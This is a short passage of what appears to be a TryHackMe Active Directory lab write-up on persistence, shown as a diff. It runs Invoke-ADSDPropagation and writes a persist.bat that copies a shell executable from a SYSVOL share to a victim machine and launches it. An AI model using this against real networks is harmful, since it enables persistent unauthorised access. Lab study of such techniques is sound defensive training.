6. Persistence

 PS C:\\Tools> Invoke-ADSDPropagation

-Create a script on the victim machine persist.bat
+Create a script on the victim machine `persist.bat` with the contents:

 copy \\\\za.tryhackme.loc\\sysvol\\za.tryhackme.loc\\scripts\\<username>_shell.exe C:\\tmp\\<username>_shell.exe && timeout /t 20 && C:\\tmp\\<username>_shell.exe